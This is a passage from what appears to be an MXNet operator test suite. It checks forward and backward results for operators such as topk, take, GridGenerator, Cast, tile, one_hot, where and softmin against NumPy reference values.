check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, rtol=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5,
is_ascend=is_ascend)])
b = mx.sym.argsort(a, axis=1, is_ascend=False)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=5,
is_ascend=False)])
b = mx.sym.argmax(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=False)])
b = mx.sym.argmin(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=True)])
for dtype in [np.float16, np.float32, np.float64]:
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(dtype)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
for axis in [1, 3, None]:
K = [1, 3, 5, 7] if axis is None else [1, 3, 5]
for k in K:
for is_ascend in [True, False]:
b = mx.sym.topk(a, axis=axis, is_ascend=is_ascend, ret_typ="value", k=k)
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=k, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, rtol=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5, is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=3, is_ascend=is_ascend, ret_typ="indices", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 3))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=3, ret_typ="indices", k=3,
is_ascend=False)])
b = mx.sym.topk(a, axis=1, is_ascend=True, ret_typ="mask", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="mask", k=3,
is_ascend=True)])
def test_blockgrad():
a = mx.sym.Variable('a')
b = mx.sym.BlockGrad(a)
exe = b._simple_bind(ctx=default_device(), a=(10, 10))
a_npy = np.random.rand(10, 10)
exe.forward(is_train=True, a=a_npy)
assert_almost_equal(exe.outputs[0], a_npy)
exe.backward() # No error if BlockGrad works
def test_take_autograd_req():
row_len = 2
col_len = 8
shape = (row_len, col_len)
sc = mx.nd.random.uniform(-1.0, 1.0, shape=shape, dtype="float32")
sc.attach_grad()
i = mx.nd.array([0], dtype="int64")
j = mx.nd.array([0], dtype="int64")
with mx.autograd.record(train_mode=True):
xs = []
for _ in range(row_len):
x_i = []
for _ in range(col_len):
x_ij = sc.take(i).squeeze(axis=0).take(j).squeeze(axis=0)
x_i.append(x_ij)
j = j + 1
i = i + 1
j = j - col_len # reset j
xs.append(mx.nd.stack(*x_i))
x = mx.nd.stack(*xs)
x = x.sum()
x.backward()
assert_almost_equal(np.ones(sc.grad.shape), sc.grad)
@pytest.mark.parametrize('mode,out_of_range', [
('clip', True),
('wrap', True),
('raise', False)
])
@pytest.mark.parametrize('data_ndim', range(1, 5))
@pytest.mark.parametrize('idx_ndim', range(1, 4))
def test_take(mode, out_of_range, data_ndim, idx_ndim):
def grad_helper(grad_in, axis, idx):
if axis == 0:
if axis == len(grad_in.shape) - 1:
grad_in[idx] += 1.0
else:
grad_in[idx, :] += 1.0
elif axis == 1:
if axis == len(grad_in.shape) - 1:
grad_in[:, idx] += 1.0
else:
grad_in[:, idx, :] += 1.0
elif axis == 2:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, idx] += 1.0
else:
grad_in[:, :, idx, :] += 1.0
elif axis == 3:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, :, idx] += 1.0
else:
grad_in[:, :, :, idx, :] += 1.0
elif axis == 4:
grad_in[:, :, :, :, idx] += 1.0
else:
raise ValueError("axis %d is not supported..." % axis)
for axis in range(-data_ndim, data_ndim):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=1, high=5), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=1, high=5), )
data = mx.sym.Variable('a')
idx = mx.sym.Variable('indices')
idx = mx.sym.BlockGrad(idx)
result = mx.sym.take(a=data, indices=idx, axis=axis, mode=mode)
exe = result._simple_bind(default_device(), a=data_shape,
indices=idx_shape)
data_real = np.random.normal(size=data_shape).astype('float32')
if out_of_range:
idx_real = np.random.randint(low=-data_shape[axis], high=data_shape[axis], size=idx_shape)
if mode == 'raise':
idx_real[idx_real == 0] = 1
idx_real *= data_shape[axis]
else:
idx_real = np.random.randint(low=0, high=data_shape[axis], size=idx_shape)
if axis < 0:
axis += len(data_shape)
grad_out = np.ones((data_shape[0:axis] if axis > 0 else ()) + idx_shape + (data_shape[axis+1:] if axis < len(data_shape) - 1 else ()), dtype='float32')
grad_in = np.zeros(data_shape, dtype='float32')
exe.arg_dict['a'][:] = mx.nd.array(data_real)
exe.arg_dict['indices'][:] = mx.nd.array(idx_real)
exe.forward(is_train=True)
if out_of_range and mode == 'raise':
try:
mx_out = exe.outputs[0].asnumpy()
except MXNetError as e:
return
else:
# Did not raise exception
assert False, "did not raise %s" % MXNetError.__name__
assert_almost_equal(exe.outputs[0], np.take(data_real, idx_real, axis=axis, mode=mode))
for i in np.nditer(idx_real):
if mode == 'clip':
i = np.clip(i, 0, data_shape[axis])
grad_helper(grad_in, axis, i)
exe.backward([mx.nd.array(grad_out)])
assert_almost_equal(exe.grad_dict['a'], grad_in)
def test_grid_generator():
# transform_type = affine
test_case = [(20,21),(4,3),(6,12),(15,17)]
for target_shape in test_case:
affine_matrix = mx.sym.Variable('affine')
grid = mx.sym.GridGenerator(data=affine_matrix,transform_type='affine', target_shape=target_shape)
exe = grid._simple_bind(ctx=default_device(), affine=(1,6), grad_req='write')
# check forward
exe.arg_dict['affine'][:] = np.array([[1.0,0,0,0,1.0,0]])
exe.forward(is_train=True)
output = exe.outputs[0]
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0]), np.arange(target_shape[1]))
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
tmp = np.zeros((3,target_shape[0]*target_shape[1]))
tmp[0] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) % target_shape[1]) * (2.0 / (target_shape[1]-1))
tmp[1] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) // target_shape[1]) * (2.0 / (target_shape[0]-1))
tmp[2] = 1
grad_est = np.dot(out_grad[0].reshape(2,target_shape[0]*target_shape[1]),tmp.T).reshape(1,6)
assert_almost_equal(exe.grad_dict['affine'], grad_est)
# check addto
exe = grid._simple_bind(ctx=default_device(), affine=(1,6), grad_req='add')
grid_grad_npy = np.random.normal(size=exe.grad_dict['affine'].shape)
exe.grad_dict['affine'][:] = grid_grad_npy
exe.arg_dict['affine'][:] = np.array([[1.0, 0, 0, 0, 1.0, 0]])
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['affine'], grad_est + grid_grad_npy)
# transform_type = warp
test_case = [(12,21),(4,3),(6,12)]
for target_shape in test_case:
flow = mx.sym.Variable('flow')
grid = mx.sym.GridGenerator(data=flow,transform_type='warp', target_shape=target_shape)
exe = grid._simple_bind(ctx=default_device(), flow=(1,2)+target_shape, grad_req='write')
# check forward
exe.arg_dict['flow'][:] = np.ones((1,2)+target_shape)
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0])+1, np.arange(target_shape[1])+1)
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
grad_est = np.zeros((1,2)+target_shape)
grad_est[0,0] = out_grad[0,0] / ((target_shape[1]-1.0) / 2.0)
grad_est[0,1] = out_grad[0,1] / ((target_shape[0]-1.0) / 2.0)
assert_almost_equal(exe.grad_dict['flow'], grad_est, rtol=1e-3)
# check addto
exe_add = grid._simple_bind(ctx=default_device(), flow=(1, 2) + target_shape, grad_req='add')
flow_grad_npy = np.random.normal(size=exe_add.grad_dict['flow'].shape)
exe_add.arg_dict['flow'][:] = np.ones((1, 2) + target_shape)
exe_add.grad_dict['flow'][:] = flow_grad_npy
exe_add.forward(is_train=True)
exe_add.backward(mx.nd.array(out_grad))
assert_almost_equal(exe_add.grad_dict['flow'], grad_est + flow_grad_npy, rtol=1e-3, atol=1e-5)
def test_index2d():
for _ in range(30):
n = np.random.randint(1, 100)
m = np.random.randint(1, 500)
data = mx.random.uniform(-1, 1, shape=(n, m), ctx=default_device())
x = mx.nd.array(np.random.randint(0, m, size=n), ctx=default_device(), dtype='int32')
r = mx.nd.batch_take(data, x)
assert_almost_equal(r, data.asnumpy()[np.arange(n), x.asnumpy()])
def test_cast():
for srctype in [np.int32, np.float32, np.float16]:
for dsttype in [np.float32, np.int32, np.float16]:
x = mx.sym.Variable('x', dtype=srctype)
y = mx.sym.Cast(x, dtype=dsttype)
exe = y._simple_bind(ctx=default_device(), x=(10, 10))
assert exe.arg_arrays[0].dtype == srctype
X = np.random.uniform(-10, 10, size=(10, 10))
exe.arg_arrays[0][:] = X
exe.forward(is_train=True)
assert exe.outputs[0].dtype == dsttype
exe.backward(mx.nd.array(X, dtype=dsttype, ctx=default_device()))
assert_almost_equal(exe.outputs[0], X.astype(srctype).astype(dsttype), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_arrays[0], X.astype(dsttype).astype(srctype), rtol=1e-3, atol=1e-5)
def get_cast_op_data():
FP16_FRACTION_BITS = 10
FP32_FRACTION_BITS = 23
FP32_EXP_MIN = -126
FP32_EXP_MAX = 127
# generate test cases in the vicinity of representable float16 mantissas
# and mid-way between them, but over the full range of float32 exponents.
for sign_bit in [0, 1]:
for exponent in range(FP32_EXP_MIN - FP32_FRACTION_BITS - 1, FP32_EXP_MAX + 2):
denominator = 2**(FP16_FRACTION_BITS + 1)
for numerator in range(0, denominator):
fraction = numerator / float(denominator)
for y in [-1.0, 0.0, 1.0]:
small_delta = y / 2**FP32_FRACTION_BITS
val = (-1.0)**sign_bit * 2.0**exponent * (1.0 + fraction + small_delta)
yield val
# Add np.nan as a final data value to process
yield np.nan
# Test requires all platforms to round float32->float16 with same round-to-nearest-even policy.
def test_cast_float32_to_float16():
input_np = np.array(list(get_cast_op_data())).astype(np.float32)
# The intermediate cast to np.float64 below gets around a numpy rounding bug that is fixed
# as of numpy 1.17 by PR https://github.com/numpy/numpy/pull/12722
expected_output = input_np.astype(np.float64).astype(np.float16)
def check_cast(op, input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float32)
sym = op(x, dtype=np.float16)
ctx = default_device()
exe = sym._bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float32, ctx=ctx)})
assert exe.arg_arrays[0].dtype == np.float32
exe.forward(is_train=True)
assert exe.outputs[0].dtype == np.float16
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
check_cast(mx.sym.Cast, input_np, expected_output)
check_cast(mx.sym.amp_cast, input_np, expected_output)
def test_amp_multicast():
if default_device().device_type == 'cpu':
return
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_device()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res._bind(ctx, {'x': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx),
'y': mx.nd.random.uniform(shape=(3, 3), dtype=np.float32, ctx=ctx),
'z': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
out1, out2, out3 = exe.outputs
assert out1.asnumpy().dtype == np.float32
assert out2.asnumpy().dtype == np.float32
assert out3.asnumpy().dtype == np.float32
def check_amp_multicast(input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_device()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res._bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float16, ctx=ctx),
'y': mx.nd.array(input_np, dtype=np.float32, ctx=ctx),
'z': mx.nd.array(input_np, dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
input_np = np.array(list(get_cast_op_data()), dtype=np.float16)
expected_output = input_np.astype(np.float32)
check_amp_multicast(input_np, expected_output)
def test_all_finite():
data = mx.sym.Variable("data", dtype=np.float32)
data2 = mx.sym.Variable("data2", dtype=np.float32)
finite_arr = mx.nd.array([[0, 0]])
inf_arr = mx.nd.array([[np.inf, np.inf]])
z = mx.sym.all_finite(data)
ctx = default_device()
exe = z._bind(ctx, {'data': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
exe = z._bind(ctx, {'data': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z._bind(ctx, {'data': finite_arr, 'data2': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z._bind(ctx, {'data': finite_arr, 'data2': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
def test_repeat():
def test_repeat_forward():
ndim_max = 6 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
repeats = 3
for ndim in range(1, ndim_max+1):
shape = ()
for _ in range(0, ndim):
shape += (np.random.randint(1, size_max+1), )
a = np.random.random_sample(size=shape)
aa = np.repeat(a, repeats)
b = mx.nd.array(a, ctx=default_device())
bb = mx.nd.repeat(b, repeats)
assert_almost_equal(aa, bb)
for axis in range(0, ndim):
aa = np.repeat(a, repeats, axis)
bb = mx.nd.repeat(b, repeats, axis)
assert_almost_equal(aa, bb)
def test_repeat_backward(axis):
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=axis)
exe = test._bind(ctx=default_device(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * repeats)
if axis == 0:
npout_grad = npout_grad.reshape(n1 * repeats, n2)
elif axis == 1:
npout_grad = npout_grad.reshape(n1, n2 * repeats)
else:
raise RuntimeError("Invalid axis value")
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
if axis == 0:
for i in range(shape[0]):
for j in range(shape[1]):
k = i * repeats
expected_grad[i][j] = sum(npout_grad[k:k + repeats, j])
elif axis == 1:
for j in range(shape[1]):
for i in range(shape[0]):
k = j * repeats
expected_grad[i][j] = sum(npout_grad[i, k:k + repeats])
else:
raise RuntimeError("Invalid axis value")
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_repeat_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=0)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-3, rtol=1e-2)
test_repeat_forward()
test_repeat_backward(axis=0)
test_repeat_backward(axis=1)
test_repeat_numeric_gradient()
def test_reverse():
data = mx.symbol.Variable('data')
shape = (5, 5, 5)
data_tmp = np.random.uniform(-1, 1, shape)
test = mx.sym.reverse(data, axis=[1, 2])
grad = np.random.uniform(-1, 1, shape)
check_numeric_gradient(test, [data_tmp], numeric_eps=2E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp[:, ::-1, ::-1]])
check_symbolic_backward(test, [data_tmp], [grad], [grad[:, ::-1, ::-1]])
def test_tile():
def test_normal_case():
ndim_min = 1
ndim_max = 5 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
length_max = 3 # max length of reps
rep_max = 10 # max number of tiling in each dim
for ndim in range(ndim_min, ndim_max+1):
shape = []
for _ in range(1, ndim+1):
shape.append(np.random.randint(1, size_max+1))
shape = tuple(shape)
a = np.random.randint(0, 100, shape)
b = mx.nd.array(a, dtype=a.dtype)
reps_len = np.random.randint(1, length_max+1)
reps_tuple = ()
for _ in range(1, reps_len):
reps_tuple += (np.random.randint(1, rep_max), )
reps_array = np.asarray(reps_tuple)
a_tiled = np.tile(a, reps_array)
b_tiled = mx.nd.tile(b, reps_tuple).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_tensor():
shape = (2, 3, 0, 4)
with mx.np_shape():
a = np.array([], dtype=np.int32).reshape(shape)
b = mx.nd.array(a, ctx=default_device(), dtype=a.dtype)
reps = (2, 4, 6)
a_tiled = np.tile(a, reps)
b_tiled = mx.nd.tile(b, reps).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_reps():
a = np.array([[2, 3, 4], [5, 6, 7]], dtype=np.int32)
b = mx.nd.array(a, ctx=default_device(), dtype=a.dtype)
a_tiled = np.tile(a, ())
b_tiled = mx.nd.tile(b, ()).asnumpy()
assert same(a_tiled, b_tiled)
def test_tile_backward():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
exe = test._bind(ctx=default_device(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * reps1 * reps2).reshape(n1 * reps1, n2 * reps2)
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
expected_grad[i][j] += sum(sum(npout_grad[i:(n1 * reps1):reps1, j:(n2 * reps2):reps2]))
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_tile_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-2, rtol=1e-2)
def test_invalid_reps():
data = mx.nd.arange(16).reshape((4, 4))
assert_exception(mx.nd.tile, MXNetError, data, (1, 2, -3))
assert_exception(mx.nd.tile, MXNetError, data, (1, 0, 3))
test_normal_case()
with mx.np_shape():
test_empty_tensor()
test_empty_reps()
test_tile_backward()
test_tile_numeric_gradient()
test_invalid_reps()
def test_one_hot():
def test_normal_case(index_type=np.int32):
ndim_max = 6
dim_size_max = 20
depth = int(dim_size_max / 2)
on_value = 1
off_value = 0
for ndim in range(1, ndim_max+1):
shape = ()
for _ in range(1, ndim+1):
shape += (np.random.randint(1, dim_size_max+1), )
indices = np.random.randint(-dim_size_max, dim_size_max+1,
size=np.prod(shape)).reshape(shape)
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_device(), dtype=index_type),
depth=depth, dtype=np.int32)
expected_array = np.zeros((np.prod(shape), depth), dtype=np.int32)
expected_array[:] = off_value
indices_1d = indices.flatten()
row = 0
for idx in indices_1d:
if 0 <= idx < depth:
expected_array[row, idx] = on_value
row += 1
expected_array = expected_array.reshape(shape + (depth, ))
one_hot_array = mx_one_hot_array.asnumpy()
assert same(expected_array, one_hot_array)
def test_empty_indices():
shape = (2, 0, 9, 3)
with mx.np_shape():
indices = np.array([]).reshape(shape)
depth = 10
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_device(), dtype=np.int32),
depth=depth, dtype=np.int32
).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth,))
assert same(expected_array, mx_one_hot_array)
def test_zero_depth():
shape = (2, 4, 9, 3)
indices = np.ones(shape)
depth = 0
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_device(), dtype=np.int32),
depth=depth, dtype=np.int32).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
assert same(expected_array, mx_one_hot_array)
test_normal_case(index_type=np.int32)
test_normal_case(index_type=np.float64)
test_normal_case(index_type=np.float32)
test_normal_case(index_type=np.float16)
with mx.np_shape():
test_empty_indices()
test_zero_depth()
def test_where():
def get_forward_expected_output(condition, x, y):
original_shape = x.shape
out = np.zeros(original_shape)
if condition.shape == x.shape:
for index, c in np.ndenumerate(condition):
if c != 0:
out[index] = x[index]
else:
out[index] = y[index]
elif condition.shape == (x.shape[0], ):
s = x.shape
m = s[0]
n = int(np.prod(s)/s[0])
x2d = x.reshape((m, n))
y2d = y.reshape((m, n))
out = out.reshape((m, n))
for i in range(0, m):
if condition[i] != 0:
for j in range(0, n):
out[i, j] = x2d[i, j]
else:
for j in range(0, n):
out[i, j] = y2d[i, j]
else:
raise RuntimeError("Invalid condition shape for where op")
out = out.reshape(original_shape)
return out
def get_forward_inputs_same_shape(shape):
condition_np = np.random.randint(0, 2, np.prod(shape)).reshape(shape)
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_forward_inputs_condition_vector(shape):
condition_np = np.random.randint(0, 2, shape[0])
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_backward_input(shape):
return np.random.randint(20, 30, np.prod(shape)).reshape(shape)
def get_backward_expected_outputs(grad_in, condition):
shape = grad_in.shape
grad_cond = np.zeros(condition.shape)
grad_x = np.empty(shape)
grad_y = np.empty(shape)
for index, c in np.ndenumerate(condition):
if 0 != c:
grad_x[index] = grad_in[index]
grad_y[index] = 0
else:
grad_x[index] = 0
grad_y[index] = grad_in[index]
return grad_cond, grad_x, grad_y
def test_where_helper(shape, same_shape):
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
out_expected = get_forward_expected_output(condition_np, x_np, y_np)
grad_in_np = get_backward_input(shape)
grad_expected_cond, grad_expected_x, grad_expected_y\
= get_backward_expected_outputs(grad_in_np, condition_np)
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
grad_in_mx = mx.nd.array(grad_in_np, dtype=np.int)
where_sym = mx.sym.where(condition, x, y)
# test req='write'
where_exe_write = where_sym._simple_bind(ctx=default_device(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='write')
# test forward req='write'
outputs = where_exe_write.forward(is_train=True, condition=condition_np,
x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='write'
where_exe_write.backward(grad_in_mx.astype('float32'))
assert same(where_exe_write.grad_dict['x'].asnumpy(), grad_expected_x)
assert same(where_exe_write.grad_dict['y'].asnumpy(), grad_expected_y)
assert same(where_exe_write.grad_dict['condition'].asnumpy(), grad_expected_cond)
# test req='add'
x_grad_init = np.random.randint(30, 40, np.prod(shape)).reshape(shape)
y_grad_init = np.random.randint(40, 50, np.prod(shape)).reshape(shape)
where_exe_add = where_sym._simple_bind(ctx=default_device(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='add')
where_exe_add.grad_dict['x'][:] = x_grad_init
where_exe_add.grad_dict['y'][:] = y_grad_init
# test forward req='add'
outputs = where_exe_add.forward(is_train=True, condition=condition_np, x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='add'
where_exe_add.backward(grad_in_mx.astype('float32'))
x_ograd = where_exe_add.grad_dict['x'].asnumpy()
y_ograd = where_exe_add.grad_dict['y'].asnumpy()
assert same(x_ograd, grad_expected_x+x_grad_init)
assert same(y_ograd, grad_expected_y+y_grad_init)
def test_where_numeric_gradient(shape, same_shape):
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
check_numeric_gradient(where_sym, [condition_np, x_np, y_np], grad_nodes=['x', 'y'])
def test_invalid_shape():
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
assert_exception(lambda: where_sym.eval(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
assert_exception(lambda: mx.nd.where(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
def test_1d_cond():
cond = mx.nd.array([1, 0, 1])
x = mx.nd.array([[2, 3], [4, 5], [6, 7]])
y = mx.nd.array([[7, 8], [9, 10], [10, 11]])
expect_out = np.array([[2, 3], [9, 10], [6, 7]])
out = mx.nd.where(cond, x, y).asnumpy()
assert(expect_out.all() == out.all())
test_where_helper((5, 9), True)
test_where_helper((5, 9), False)
test_where_helper((5, 7, 9), True)
test_where_helper((5, 7, 9), False)
test_where_helper((10, 8, 15, 3), True)
test_where_helper((10, 8, 15, 3), False)
test_where_numeric_gradient((5, 9), True)
test_where_numeric_gradient((5, 9), False)
test_where_numeric_gradient((5, 7, 9), True)
test_where_numeric_gradient((5, 7, 9), False)
test_invalid_shape()
test_1d_cond()
def test_softmin():
for ndim in range(1, 5):
for dtype in [np.float16, np.float32, np.float64]:
rtol, atol = (1e-2, 5e-3) if dtype is np.float16 else (1e-3, 1e-3)
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape).astype(dtype)
data = data / 10 if dtype is np.float16 else data
sym = mx.sym.softmin(axis=axis)
expected_fwd = np_softmax(-data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], atol=atol, dtype=dtype)
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=rtol, atol=atol, grad_req=req, dtype=dtype)
if dtype is not np.float16:
check_numeric_gradient(sym, [data], rtol=rtol, atol=atol, dtype=dtype)
def test_new_softmax():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.softmax(axis=axis)
expected_fwd = np_softmax(data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd])
for req in ['null', 'add', 'write']:
